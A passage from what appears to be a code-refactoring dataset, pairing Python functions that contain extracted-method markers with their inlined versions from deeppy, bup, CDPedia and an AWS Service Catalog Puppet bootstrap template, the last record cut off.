w_shape = (n_filter, n_channel) + win_shape
x = np.random.normal(size=x_shape).astype(ca.float_)
w = np.random.normal(size=w_shape).astype(ca.float_) * 0.0001
b = np.random.normal(size=(1, n_filter, 1, 1)).astype(ca.float_) * 0.0001
layer = dp.Convolution(n_filter, win_shape, weights=w, bias=b, strides=stride, border_mode=border_mode)
layer.setup(x_shape)
<DeepExtract>
pad = padding(win_shape, border_mode)
h = (img_shape[0] + 2 * pad[0] - win_shape[0]) // stride[0] + 1
w = (img_shape[1] + 2 * pad[1] - win_shape[1]) // stride[1] + 1
y_img_shape = (h, w)
</DeepExtract>
assert layer.y_shape(x_shape) == (batch_size, n_filter) + y_img_shape
check_grad(layer, x)
check_params(layer)
|
def test_convolution():
n_filters = [1, 5, 10]
win_shapes = [(1, 1), (3, 3), (5, 5)]
strides = [(1, 1), (2, 2), (3, 3)]
border_modes = ['valid', 'same', 'full']
confs = itertools.product(batch_sizes, n_channels, img_shapes, n_filters, win_shapes, strides, border_modes)
confs = shuffled(confs)[:100]
for (batch_size, n_channel, img_shape, n_filter, win_shape, stride, border_mode) in confs:
if img_shape[0] < win_shape[0] or img_shape[1] < win_shape[1]:
continue
print('Convolution: batch_size=%i, n_channel=%i, img_shape=%s, n_filter=%i, win_shape=%s, stride=%s, border_mode=%s' % (batch_size, n_channel, str(img_shape), n_filter, str(win_shape), str(stride), border_mode))
x_shape = (batch_size, n_channel) + img_shape
w_shape = (n_filter, n_channel) + win_shape
x = np.random.normal(size=x_shape).astype(ca.float_)
w = np.random.normal(size=w_shape).astype(ca.float_) * 0.0001
b = np.random.normal(size=(1, n_filter, 1, 1)).astype(ca.float_) * 0.0001
layer = dp.Convolution(n_filter, win_shape, weights=w, bias=b, strides=stride, border_mode=border_mode)
layer.setup(x_shape)
pad = padding(win_shape, border_mode)
h = (img_shape[0] + 2 * pad[0] - win_shape[0]) // stride[0] + 1
w = (img_shape[1] + 2 * pad[1] - win_shape[1]) // stride[1] + 1
y_img_shape = (h, w)
assert layer.y_shape(x_shape) == (batch_size, n_filter) + y_img_shape
check_grad(layer, x)
check_params(layer)
|
deeppy
|
positive
|
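The inlined block in test_convolution computes the expected output shape from the standard convolution formula, with per-mode padding supplied by the padding() helper. A self-contained sketch of that calculation (the padding rule below is an assumption: 'valid' pads by 0, 'same' by (win - 1) // 2, 'full' by win - 1):

def conv_output_shape(img_shape, win_shape, stride, border_mode):
    # Per-dimension padding for the three common border modes.
    pad_for = {'valid': lambda k: 0,
               'same': lambda k: (k - 1) // 2,
               'full': lambda k: k - 1}[border_mode]
    out = []
    for size, win, s in zip(img_shape, win_shape, stride):
        pad = pad_for(win)
        out.append((size + 2 * pad - win) // s + 1)
    return tuple(out)

# A 5x5 window on a 32x32 image with stride 1 and 'same' padding keeps the size:
assert conv_output_shape((32, 32), (5, 5), (1, 1), 'same') == (32, 32)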
def run_module_cmd(module, args):
if not (fix_stdout or fix_stderr):
<DeepExtract>
if do_profile:
import cProfile
f = compile('module.main(args)', __file__, 'exec')
cProfile.runctx(f, globals(), locals())
else:
module.main(args)
</DeepExtract>
return
srcs = []
dests = []
real_out_fd = real_err_fd = stdout_pipe = stderr_pipe = None
filter_thread = filter_thread_started = None
pending_ex = None
try:
if fix_stdout:
sys.stdout.flush()
stdout_pipe = os.pipe()
real_out_fd = os.dup(sys.stdout.fileno())
os.dup2(stdout_pipe[1], sys.stdout.fileno())
srcs.append(stdout_pipe[0])
dests.append(real_out_fd)
if fix_stderr:
sys.stderr.flush()
stderr_pipe = os.pipe()
real_err_fd = os.dup(sys.stderr.fileno())
os.dup2(stderr_pipe[1], sys.stderr.fileno())
srcs.append(stderr_pipe[0])
dests.append(real_err_fd)
filter_thread = Thread(name='output filter', target=lambda : filter_output(srcs, dests))
filter_thread.start()
filter_thread_started = True
<DeepExtract>
if do_profile:
import cProfile
f = compile('module.main(args)', __file__, 'exec')
cProfile.runctx(f, globals(), locals())
else:
module.main(args)
</DeepExtract>
except Exception as ex:
add_ex_tb(ex)
pending_ex = ex
raise
finally:
try:
real_out_fd is not None and os.dup2(real_out_fd, sys.stdout.fileno())
except Exception as ex:
add_ex_tb(ex)
add_ex_ctx(ex, pending_ex)
try:
real_err_fd is not None and os.dup2(real_err_fd, sys.stderr.fileno())
except Exception as ex:
add_ex_tb(ex)
add_ex_ctx(ex, pending_ex)
try:
stdout_pipe is not None and os.close(stdout_pipe[1])
except Exception as ex:
add_ex_tb(ex)
add_ex_ctx(ex, pending_ex)
try:
stderr_pipe is not None and os.close(stderr_pipe[1])
except Exception as ex:
add_ex_tb(ex)
add_ex_ctx(ex, pending_ex)
try:
close_catpipes()
except Exception as ex:
add_ex_tb(ex)
add_ex_ctx(ex, pending_ex)
if pending_ex:
raise pending_ex
if filter_thread_started:
filter_thread.join()
|
def run_module_cmd(module, args):
if not (fix_stdout or fix_stderr):
if do_profile:
import cProfile
f = compile('module.main(args)', __file__, 'exec')
cProfile.runctx(f, globals(), locals())
else:
module.main(args)
return
srcs = []
dests = []
real_out_fd = real_err_fd = stdout_pipe = stderr_pipe = None
filter_thread = filter_thread_started = None
pending_ex = None
try:
if fix_stdout:
sys.stdout.flush()
stdout_pipe = os.pipe()
real_out_fd = os.dup(sys.stdout.fileno())
os.dup2(stdout_pipe[1], sys.stdout.fileno())
srcs.append(stdout_pipe[0])
dests.append(real_out_fd)
if fix_stderr:
sys.stderr.flush()
stderr_pipe = os.pipe()
real_err_fd = os.dup(sys.stderr.fileno())
os.dup2(stderr_pipe[1], sys.stderr.fileno())
srcs.append(stderr_pipe[0])
dests.append(real_err_fd)
filter_thread = Thread(name='output filter', target=lambda : filter_output(srcs, dests))
filter_thread.start()
filter_thread_started = True
if do_profile:
import cProfile
f = compile('module.main(args)', __file__, 'exec')
cProfile.runctx(f, globals(), locals())
else:
module.main(args)
except Exception as ex:
add_ex_tb(ex)
pending_ex = ex
raise
finally:
try:
real_out_fd is not None and os.dup2(real_out_fd, sys.stdout.fileno())
except Exception as ex:
add_ex_tb(ex)
add_ex_ctx(ex, pending_ex)
try:
real_err_fd is not None and os.dup2(real_err_fd, sys.stderr.fileno())
except Exception as ex:
add_ex_tb(ex)
add_ex_ctx(ex, pending_ex)
try:
stdout_pipe is not None and os.close(stdout_pipe[1])
except Exception as ex:
add_ex_tb(ex)
add_ex_ctx(ex, pending_ex)
try:
stderr_pipe is not None and os.close(stderr_pipe[1])
except Exception as ex:
add_ex_tb(ex)
add_ex_ctx(ex, pending_ex)
try:
close_catpipes()
except Exception as ex:
add_ex_tb(ex)
add_ex_ctx(ex, pending_ex)
if pending_ex:
raise pending_ex
if filter_thread_started:
filter_thread.join()
|
bup
|
positive
|
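run_module_cmd swaps the process-level stdout/stderr file descriptors onto a pipe so a filter thread can rewrite the command's output, then restores the real descriptors in the finally block. A minimal, hypothetical sketch of that fd-swapping idiom for stdout only (it drains the pipe after the call returns, so it suits small outputs; bup instead drains concurrently with its filter thread):

import os
import sys

def run_with_captured_stdout(run):
    sys.stdout.flush()
    read_fd, write_fd = os.pipe()
    real_out_fd = os.dup(sys.stdout.fileno())      # keep the real stdout
    os.dup2(write_fd, sys.stdout.fileno())         # route fd 1 into the pipe
    try:
        run()
    finally:
        sys.stdout.flush()
        os.dup2(real_out_fd, sys.stdout.fileno())  # restore the real stdout
        os.close(write_fd)
        os.close(real_out_fd)
    with os.fdopen(read_fd) as pipe_reader:        # read what was captured
        return pipe_reader.read()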
def check_template(self):
"""Check if messages in sources and template are the same."""
<DeepExtract>
with open(self.po_template, 'rb') as fh:
catalog = read_po(fh, lang)
messages_old = [m.id for m in catalog][1:]
</DeepExtract>
(_, filepath) = tempfile.mkstemp()
<DeepExtract>
if filepath is None:
filepath = self.po_template
self._run('extract', '-F', self.config, '-o', filepath, '--project', 'CDPedia', '--copyright-holder', 'CDPedistas (see AUTHORS.txt)', self.source_dir)
</DeepExtract>
<DeepExtract>
with open(filepath, 'rb') as fh:
catalog = read_po(fh, lang)
messages_new = [m.id for m in catalog][1:]
</DeepExtract>
os.remove(filepath)
self.source_messages = len(messages_new)
self.template_updated = messages_old == messages_new
logger.info('Messages: %d in sources, %d in template, up to date: %s', len(messages_new), len(messages_old), self.template_updated)
|
def check_template(self):
"""Check if messages in sources and template are the same."""
with open(self.po_template, 'rb') as fh:
catalog = read_po(fh, lang)
messages_old = [m.id for m in catalog][1:]
(_, filepath) = tempfile.mkstemp()
if filepath is None:
filepath = self.po_template
self._run('extract', '-F', self.config, '-o', filepath, '--project', 'CDPedia', '--copyright-holder', 'CDPedistas (see AUTHORS.txt)', self.source_dir)
with open(filepath, 'rb') as fh:
catalog = read_po(fh, lang)
messages_new = [m.id for m in catalog][1:]
os.remove(filepath)
self.source_messages = len(messages_new)
self.template_updated = messages_old == messages_new
logger.info('Messages: %d in sources, %d in template, up to date: %s', len(messages_new), len(messages_old), self.template_updated)
|
CDPedia
|
positive
|
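check_template decides whether the .pot template is current by comparing the ordered message ids already in the template with those freshly extracted from the sources; the [1:] slice drops the header entry that babel yields first. A hedged sketch of that comparison, assuming babel's read_po behaves as it is used above:

from babel.messages.pofile import read_po

def message_ids(po_path, locale=None):
    # Parse a .po/.pot file and return its message ids, skipping the header entry.
    with open(po_path, 'rb') as fh:
        catalog = read_po(fh, locale)
    return [message.id for message in catalog][1:]

def template_is_up_to_date(template_path, extracted_path):
    # "Up to date" means the sources yield exactly the same ids, in the same order.
    return message_ids(template_path) == message_ids(extracted_path)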
def get_template(puppet_version, all_regions, source, is_caching_enabled, is_manual_approvals: bool, scm_skip_creation_of_repo: bool, should_validate: bool) -> t.Template:
is_codecommit = source.get('Provider', '').lower() == 'codecommit'
is_github = source.get('Provider', '').lower() == 'github'
is_codestarsourceconnection = source.get('Provider', '').lower() == 'codestarsourceconnection'
is_custom = source.get('Provider', '').lower() == 'custom'
is_s3 = source.get('Provider', '').lower() == 's3'
description = f'Bootstrap template used to bring up the main ServiceCatalog-Puppet AWS CodePipeline with dependencies\n{{"version": "{puppet_version}", "framework": "servicecatalog-puppet", "role": "bootstrap-master"}}'
template = t.Template(Description=description)
version_parameter = template.add_parameter(t.Parameter('Version', Default=puppet_version, Type='String'))
org_iam_role_arn_parameter = template.add_parameter(t.Parameter('OrgIamRoleArn', Default='None', Type='String'))
with_manual_approvals_parameter = template.add_parameter(t.Parameter('WithManualApprovals', Type='String', AllowedValues=['Yes', 'No'], Default='No'))
puppet_code_pipeline_role_permission_boundary_parameter = template.add_parameter(t.Parameter('PuppetCodePipelineRolePermissionBoundary', Type='String', Description='IAM Permission Boundary to apply to the PuppetCodePipelineRole', Default=awscs_iam.ARN(resource='policy/AdministratorAccess').data))
source_role_permissions_boundary_parameter = template.add_parameter(t.Parameter('SourceRolePermissionsBoundary', Type='String', Description='IAM Permission Boundary to apply to the SourceRole', Default=awscs_iam.ARN(resource='policy/AdministratorAccess').data))
puppet_generate_role_permission_boundary_parameter = template.add_parameter(t.Parameter('PuppetGenerateRolePermissionBoundary', Type='String', Description='IAM Permission Boundary to apply to the PuppetGenerateRole', Default=awscs_iam.ARN(resource='policy/AdministratorAccess').data))
puppet_deploy_role_permission_boundary_parameter = template.add_parameter(t.Parameter('PuppetDeployRolePermissionBoundary', Type='String', Description='IAM Permission Boundary to apply to the PuppetDeployRole', Default=awscs_iam.ARN(resource='policy/AdministratorAccess').data))
puppet_provisioning_role_permissions_boundary_parameter = template.add_parameter(t.Parameter('PuppetProvisioningRolePermissionsBoundary', Type='String', Description='IAM Permission Boundary to apply to the PuppetProvisioningRole', Default=awscs_iam.ARN(resource='policy/AdministratorAccess').data))
cloud_formation_deploy_role_permissions_boundary_parameter = template.add_parameter(t.Parameter('CloudFormationDeployRolePermissionsBoundary', Type='String', Description='IAM Permission Boundary to apply to the CloudFormationDeployRole', Default=awscs_iam.ARN(resource='policy/AdministratorAccess').data))
deploy_environment_compute_type_parameter = template.add_parameter(t.Parameter('DeployEnvironmentComputeType', Type='String', Description='The AWS CodeBuild Environment Compute Type', Default='BUILD_GENERAL1_SMALL'))
spoke_deploy_environment_compute_type_parameter = template.add_parameter(t.Parameter('SpokeDeployEnvironmentComputeType', Type='String', Description='The AWS CodeBuild Environment Compute Type for spoke execution mode', Default='BUILD_GENERAL1_SMALL'))
deploy_num_workers_parameter = template.add_parameter(t.Parameter('DeployNumWorkers', Type='Number', Description='Number of workers that should be used when running a deploy', Default=10))
puppet_role_name_parameter = template.add_parameter(t.Parameter('PuppetRoleName', Type='String', Default='PuppetRole'))
puppet_role_path_template_parameter = template.add_parameter(t.Parameter('PuppetRolePath', Type='String', Default='/servicecatalog-puppet/'))
template.add_condition('ShouldUseOrgs', t.Not(t.Equals(t.Ref(org_iam_role_arn_parameter), 'None')))
template.add_condition('HasManualApprovals', t.Equals(t.Ref(with_manual_approvals_parameter), 'Yes'))
template.add_resource(s3.Bucket('StacksRepository', BucketName=t.Sub('sc-puppet-stacks-repository-${AWS::AccountId}'), VersioningConfiguration=s3.VersioningConfiguration(Status='Enabled'), BucketEncryption=s3.BucketEncryption(ServerSideEncryptionConfiguration=[s3.ServerSideEncryptionRule(ServerSideEncryptionByDefault=s3.ServerSideEncryptionByDefault(SSEAlgorithm='AES256'))]), PublicAccessBlockConfiguration=s3.PublicAccessBlockConfiguration(BlockPublicAcls=True, BlockPublicPolicy=True, IgnorePublicAcls=True, RestrictPublicBuckets=True), Tags=t.Tags({'ServiceCatalogPuppet:Actor': 'Framework'})))
log_bucket = template.add_resource(s3.Bucket('LogStore', BucketName=t.Sub('sc-puppet-log-store-${AWS::AccountId}'), VersioningConfiguration=s3.VersioningConfiguration(Status='Enabled'), BucketEncryption=s3.BucketEncryption(ServerSideEncryptionConfiguration=[s3.ServerSideEncryptionRule(ServerSideEncryptionByDefault=s3.ServerSideEncryptionByDefault(SSEAlgorithm='AES256'))]), PublicAccessBlockConfiguration=s3.PublicAccessBlockConfiguration(BlockPublicAcls=True, BlockPublicPolicy=True, IgnorePublicAcls=True, RestrictPublicBuckets=True), Tags=t.Tags({'ServiceCatalogPuppet:Actor': 'Framework'})))
manual_approvals_param = template.add_resource(ssm.Parameter('ManualApprovalsParam', Type='String', Name='/servicecatalog-puppet/manual-approvals', Value=t.Ref(with_manual_approvals_parameter)))
template.add_resource(ssm.Parameter('SpokeDeployEnvParameter', Type='String', Name=constants.SPOKE_EXECUTION_MODE_DEPLOY_ENV_PARAMETER_NAME, Value=t.Ref(spoke_deploy_environment_compute_type_parameter)))
param = template.add_resource(ssm.Parameter('Param', Type='String', Name='service-catalog-puppet-version', Value=t.Ref(version_parameter)))
partition_parameter = template.add_resource(ssm.Parameter('PartitionParameter', Type='String', Name='/servicecatalog-puppet/partition', Value=t.Ref('AWS::Partition')))
puppet_role_name_parameter = template.add_resource(ssm.Parameter('PuppetRoleNameParameter', Type='String', Name='/servicecatalog-puppet/puppet-role/name', Value=t.Ref(puppet_role_name_parameter)))
puppet_role_path_parameter = template.add_resource(ssm.Parameter('PuppetRolePathParameter', Type='String', Name='/servicecatalog-puppet/puppet-role/path', Value=t.Ref(puppet_role_path_template_parameter)))
template.add_resource(iam.Role('ShareAcceptFunctionRole', RoleName='ShareAcceptFunctionRole', ManagedPolicyArns=[t.Sub('arn:${AWS::Partition}:iam::aws:policy/service-role/AWSLambdaBasicExecutionRole')], Path=t.Ref(puppet_role_path_template_parameter), Policies=[iam.Policy(PolicyName='ServiceCatalogActions', PolicyDocument={'Version': '2012-10-17', 'Statement': [{'Action': ['sts:AssumeRole'], 'Resource': {'Fn::Sub': 'arn:${AWS::Partition}:iam::*:role${PuppetRolePath}${PuppetRoleName}'}, 'Effect': 'Allow'}]})], AssumeRolePolicyDocument={'Version': '2012-10-17', 'Statement': [{'Action': ['sts:AssumeRole'], 'Effect': 'Allow', 'Principal': {'Service': ['lambda.amazonaws.com']}}]}))
template.add_resource(iam.Role('ProvisioningRole', RoleName='PuppetProvisioningRole', AssumeRolePolicyDocument={'Version': '2012-10-17', 'Statement': [{'Action': ['sts:AssumeRole'], 'Effect': 'Allow', 'Principal': {'Service': ['codebuild.amazonaws.com']}}, {'Action': ['sts:AssumeRole'], 'Effect': 'Allow', 'Principal': {'AWS': {'Fn::Sub': '${AWS::AccountId}'}}}]}, ManagedPolicyArns=[t.Sub('arn:${AWS::Partition}:iam::aws:policy/AdministratorAccess')], PermissionsBoundary=t.Ref(puppet_provisioning_role_permissions_boundary_parameter), Path=t.Ref(puppet_role_path_template_parameter)))
template.add_resource(iam.Role('CloudFormationDeployRole', RoleName='CloudFormationDeployRole', AssumeRolePolicyDocument={'Version': '2012-10-17', 'Statement': [{'Action': ['sts:AssumeRole'], 'Effect': 'Allow', 'Principal': {'Service': ['cloudformation.amazonaws.com']}}, {'Action': ['sts:AssumeRole'], 'Effect': 'Allow', 'Principal': {'AWS': {'Fn::Sub': '${AWS::AccountId}'}}}]}, ManagedPolicyArns=[t.Sub('arn:${AWS::Partition}:iam::aws:policy/AdministratorAccess')], PermissionsBoundary=t.Ref(cloud_formation_deploy_role_permissions_boundary_parameter), Path=t.Ref(puppet_role_path_template_parameter)))
template.add_resource(iam.Role('PipelineRole', RoleName='PuppetCodePipelineRole', AssumeRolePolicyDocument={'Version': '2012-10-17', 'Statement': [{'Action': ['sts:AssumeRole'], 'Effect': 'Allow', 'Principal': {'Service': ['codepipeline.amazonaws.com']}}]}, ManagedPolicyArns=[t.Sub('arn:${AWS::Partition}:iam::aws:policy/AdministratorAccess')], PermissionsBoundary=t.Ref(puppet_code_pipeline_role_permission_boundary_parameter), Path=t.Ref(puppet_role_path_template_parameter)))
template.add_resource(iam.Role('SourceRole', RoleName='PuppetSourceRole', AssumeRolePolicyDocument={'Version': '2012-10-17', 'Statement': [{'Action': ['sts:AssumeRole'], 'Effect': 'Allow', 'Principal': {'Service': ['codepipeline.amazonaws.com']}}, {'Action': ['sts:AssumeRole'], 'Effect': 'Allow', 'Principal': {'AWS': {'Fn::Sub': 'arn:${AWS::Partition}:iam::${AWS::AccountId}:root'}}}]}, ManagedPolicyArns=[t.Sub('arn:${AWS::Partition}:iam::aws:policy/AdministratorAccess')], PermissionsBoundary=t.Ref(source_role_permissions_boundary_parameter), Path=t.Ref(puppet_role_path_template_parameter)))
template.add_resource(iam.Role(constants.REPORTING_ROLE_NAME, RoleName=constants.REPORTING_ROLE_NAME, MaxSessionDuration=43200, AssumeRolePolicyDocument={'Version': '2012-10-17', 'Statement': [{'Action': ['sts:AssumeRole'], 'Effect': 'Allow', 'Principal': {'AWS': {'Fn::Sub': 'arn:${AWS::Partition}:iam::${AWS::AccountId}:root'}}}]}, Policies=[iam.Policy(PolicyName='ReportingActions', PolicyDocument={'Version': '2012-10-17', 'Statement': [{'Action': ['s3:PutObject'], 'Resource': t.Sub('${LogStore.Arn}/*'), 'Effect': 'Allow'}, {'Action': ['cloudwatch:PutMetricData'], 'Resource': '*', 'Effect': 'Allow'}]})], Path=t.Ref(puppet_role_path_template_parameter)))
template.add_resource(iam.Role(constants.CACHE_DOWNLOADING_ROLE_NAME, RoleName=constants.CACHE_DOWNLOADING_ROLE_NAME, MaxSessionDuration=43200, AssumeRolePolicyDocument={'Version': '2012-10-17', 'Statement': [{'Action': ['sts:AssumeRole'], 'Effect': 'Allow', 'Principal': {'AWS': {'Fn::Sub': 'arn:${AWS::Partition}:iam::${AWS::AccountId}:root'}}}]}, Policies=[iam.Policy(PolicyName='DownloadingCacheActions', PolicyDocument={'Version': '2012-10-17', 'Statement': [{'Action': ['s3:GetObject'], 'Resource': t.Sub('${CachingBucket.Arn}/*'), 'Effect': 'Allow'}]})], Path=t.Ref(puppet_role_path_template_parameter)))
template.add_resource(sns.Topic('DryRunNotificationTopic', DisplayName='service-catalog-puppet-dry-run-approvals', TopicName='service-catalog-puppet-dry-run-approvals', Condition='HasManualApprovals'))
deploy_role = template.add_resource(iam.Role('DeployRole', RoleName='PuppetDeployRole', AssumeRolePolicyDocument={'Version': '2012-10-17', 'Statement': [{'Action': ['sts:AssumeRole'], 'Effect': 'Allow', 'Principal': {'Service': ['codebuild.amazonaws.com']}}]}, ManagedPolicyArns=[t.Sub('arn:${AWS::Partition}:iam::aws:policy/AdministratorAccess')], PermissionsBoundary=t.Ref(puppet_deploy_role_permission_boundary_parameter), Path=t.Ref(puppet_role_path_template_parameter)))
num_workers_ssm_parameter = template.add_resource(ssm.Parameter('NumWorkersSSMParameter', Type='String', Name='/servicecatalog-puppet/deploy/num-workers', Value=t.Sub('${DeployNumWorkers}')))
parameterised_source_bucket = template.add_resource(s3.Bucket('ParameterisedSourceBucket', PublicAccessBlockConfiguration=s3.PublicAccessBlockConfiguration(IgnorePublicAcls=True, BlockPublicPolicy=True, BlockPublicAcls=True, RestrictPublicBuckets=True), BucketEncryption=s3.BucketEncryption(ServerSideEncryptionConfiguration=[s3.ServerSideEncryptionRule(ServerSideEncryptionByDefault=s3.ServerSideEncryptionByDefault(SSEAlgorithm='AES256'))]), Tags=t.Tags.from_dict(**{'ServiceCatalogPuppet:Actor': 'Framework'}), BucketName=t.Sub('sc-puppet-parameterised-runs-${AWS::AccountId}'), VersioningConfiguration=s3.VersioningConfiguration(Status='Enabled')))
source_stage = codepipeline.Stages(Name='Source', Actions=[codepipeline.Actions(RunOrder=1, RoleArn=t.GetAtt('SourceRole', 'Arn'), ActionTypeId=codepipeline.ActionTypeId(Category='Source', Owner='AWS', Version='1', Provider='S3'), OutputArtifacts=[codepipeline.OutputArtifacts(Name='ParameterisedSource')], Configuration={'S3Bucket': t.Ref(parameterised_source_bucket), 'S3ObjectKey': 'parameters.zip', 'PollForSourceChanges': True}, Name='ParameterisedSource')])
install_spec = {'runtime-versions': dict(python='3.9'), 'commands': [f'pip install {puppet_version}' if 'http' in puppet_version else f'pip install aws-service-catalog-puppet=={puppet_version}']}
deploy_env_vars = [{'Type': 'PLAINTEXT', 'Name': 'PUPPET_ACCOUNT_ID', 'Value': t.Ref('AWS::AccountId')}, {'Type': 'PLAINTEXT', 'Name': 'PUPPET_REGION', 'Value': t.Ref('AWS::Region')}, {'Type': 'PARAMETER_STORE', 'Name': 'PARTITION', 'Value': t.Ref(partition_parameter)}, {'Type': 'PARAMETER_STORE', 'Name': 'PUPPET_ROLE_NAME', 'Value': t.Ref(puppet_role_name_parameter)}, {'Type': 'PARAMETER_STORE', 'Name': 'PUPPET_ROLE_PATH', 'Value': t.Ref(puppet_role_path_parameter)}]
if is_codecommit:
template.add_resource(codecommit.Repository('CodeRepo', RepositoryName=source.get('Configuration').get('RepositoryName'), RepositoryDescription='Repo to store the servicecatalog puppet solution', DeletionPolicy='Retain'))
source_stage.Actions.append(codepipeline.Actions(RunOrder=1, RoleArn=t.GetAtt('SourceRole', 'Arn'), ActionTypeId=codepipeline.ActionTypeId(Category='Source', Owner='AWS', Version='1', Provider='CodeCommit'), OutputArtifacts=[codepipeline.OutputArtifacts(Name='Source')], Configuration={'RepositoryName': source.get('Configuration').get('RepositoryName'), 'BranchName': source.get('Configuration').get('BranchName'), 'PollForSourceChanges': source.get('Configuration').get('PollForSourceChanges', True)}, Name='Source'))
if is_github:
source_stage.Actions.append(codepipeline.Actions(RunOrder=1, ActionTypeId=codepipeline.ActionTypeId(Category='Source', Owner='ThirdParty', Version='1', Provider='GitHub'), OutputArtifacts=[codepipeline.OutputArtifacts(Name='Source')], Configuration={'Owner': source.get('Configuration').get('Owner'), 'Repo': source.get('Configuration').get('Repo'), 'Branch': source.get('Configuration').get('Branch'), 'OAuthToken': t.Join('', ['{{resolve:secretsmanager:', source.get('Configuration').get('SecretsManagerSecret'), ':SecretString:OAuthToken}}']), 'PollForSourceChanges': source.get('Configuration').get('PollForSourceChanges')}, Name='Source'))
if is_custom:
source_stage.Actions.append(codepipeline.Actions(RunOrder=1, ActionTypeId=codepipeline.ActionTypeId(Category='Source', Owner='Custom', Version=source.get('Configuration').get('CustomActionTypeVersion'), Provider=source.get('Configuration').get('CustomActionTypeProvider')), OutputArtifacts=[codepipeline.OutputArtifacts(Name='Source')], Configuration={'GitUrl': source.get('Configuration').get('GitUrl'), 'Branch': source.get('Configuration').get('Branch'), 'PipelineName': t.Sub('${AWS::StackName}-pipeline')}, Name='Source'))
webhook = codepipeline.Webhook('Webhook', Authentication='IP', TargetAction='Source', AuthenticationConfiguration=codepipeline.WebhookAuthConfiguration(AllowedIPRange=source.get('Configuration').get('GitWebHookIpAddress')), Filters=[codepipeline.WebhookFilterRule(JsonPath='$.changes[0].ref.id', MatchEquals='refs/heads/{Branch}')], TargetPipelineVersion=1, TargetPipeline=t.Sub('${AWS::StackName}-pipeline'))
template.add_resource(webhook)
values_for_sub = {'GitUrl': source.get('Configuration').get('GitUrl'), 'WebhookUrl': t.GetAtt(webhook, 'Url')}
output_to_add = t.Output('WebhookUrl')
output_to_add.Value = t.Sub('${GitUrl}||${WebhookUrl}', **values_for_sub)
output_to_add.Export = t.Export(t.Sub('${AWS::StackName}-pipeline'))
template.add_output(output_to_add)
if is_codestarsourceconnection:
source_stage.Actions.append(codepipeline.Actions(RunOrder=1, RoleArn=t.GetAtt('SourceRole', 'Arn'), ActionTypeId=codepipeline.ActionTypeId(Category='Source', Owner='AWS', Version='1', Provider='CodeStarSourceConnection'), OutputArtifacts=[codepipeline.OutputArtifacts(Name='Source')], Configuration={'ConnectionArn': source.get('Configuration').get('ConnectionArn'), 'FullRepositoryId': source.get('Configuration').get('FullRepositoryId'), 'BranchName': source.get('Configuration').get('BranchName'), 'OutputArtifactFormat': source.get('Configuration').get('OutputArtifactFormat')}, Name='Source'))
if is_s3:
bucket_name = source.get('Configuration').get('S3Bucket')
if not scm_skip_creation_of_repo:
template.add_resource(s3.Bucket(bucket_name, PublicAccessBlockConfiguration=s3.PublicAccessBlockConfiguration(IgnorePublicAcls=True, BlockPublicPolicy=True, BlockPublicAcls=True, RestrictPublicBuckets=True), BucketEncryption=s3.BucketEncryption(ServerSideEncryptionConfiguration=[s3.ServerSideEncryptionRule(ServerSideEncryptionByDefault=s3.ServerSideEncryptionByDefault(SSEAlgorithm='AES256'))]), Tags=t.Tags.from_dict(**{'ServiceCatalogPuppet:Actor': 'Framework'}), BucketName=bucket_name, VersioningConfiguration=s3.VersioningConfiguration(Status='Enabled')))
source_stage.Actions.append(codepipeline.Actions(RunOrder=1, ActionTypeId=codepipeline.ActionTypeId(Category='Source', Owner='AWS', Version='1', Provider='S3'), OutputArtifacts=[codepipeline.OutputArtifacts(Name='Source')], Configuration={'S3Bucket': bucket_name, 'S3ObjectKey': source.get('Configuration').get('S3ObjectKey'), 'PollForSourceChanges': source.get('Configuration').get('PollForSourceChanges')}, Name='Source'))
<DeepExtract>
single_account_run_project_build_spec = dict(version=0.2, phases=dict(install=install_spec, build={'commands': ['echo "single_account: \\"${SINGLE_ACCOUNT_ID}\\"" > parameters.yaml', 'cat parameters.yaml', 'zip parameters.zip parameters.yaml', 'aws s3 cp parameters.zip s3://sc-puppet-parameterised-runs-${PUPPET_ACCOUNT_ID}/parameters.zip']}, post_build={'commands': ['servicecatalog-puppet wait-for-parameterised-run-to-complete']}), artifacts=dict(name='DeployProject', files=['ServiceCatalogPuppet/manifest.yaml', 'ServiceCatalogPuppet/manifest-expanded.yaml', 'results/*/*', 'output/*/*', 'exploded_results/*/*', 'tasks.log']))
single_account_run_project_args = dict(Name='servicecatalog-puppet-single-account-run', Description='Runs puppet for a single account - SINGLE_ACCOUNT_ID', ServiceRole=t.GetAtt(deploy_role, 'Arn'), Tags=t.Tags.from_dict(**{'ServiceCatalogPuppet:Actor': 'Framework'}), Artifacts=codebuild.Artifacts(Type='NO_ARTIFACTS'), TimeoutInMinutes=480, Environment=codebuild.Environment(ComputeType=t.Ref(deploy_environment_compute_type_parameter), Image=constants.CODEBUILD_DEFAULT_IMAGE, Type='LINUX_CONTAINER', EnvironmentVariables=[{'Type': 'PLAINTEXT', 'Name': 'SINGLE_ACCOUNT_ID', 'Value': 'CHANGE_ME'}] + deploy_env_vars), Source=codebuild.Source(Type='NO_SOURCE', BuildSpec=yaml.safe_dump(single_account_run_project_build_spec)))
single_account_run_project = template.add_resource(codebuild.Project('SingleAccountRunProject', **single_account_run_project_args))
single_account_run_project_build_spec['phases']['post_build']['commands'] = ['servicecatalog-puppet wait-for-parameterised-run-to-complete --on-complete-url $CALLBACK_URL']
single_account_run_project_args['Name'] = 'servicecatalog-puppet-single-account-run-with-callback'
single_account_run_project_args['Description'] = 'Runs puppet for a single account - SINGLE_ACCOUNT_ID and then does a http put'
single_account_run_project_args.get('Environment').EnvironmentVariables.append({'Type': 'PLAINTEXT', 'Name': 'CALLBACK_URL', 'Value': 'CHANGE_ME'})
single_account_run_project_args['Source'] = codebuild.Source(Type='NO_SOURCE', BuildSpec=yaml.safe_dump(single_account_run_project_build_spec))
single_account_run_project_with_callback = template.add_resource(codebuild.Project('SingleAccountRunWithCallbackProject', **single_account_run_project_args))
</DeepExtract>
<DeepExtract>
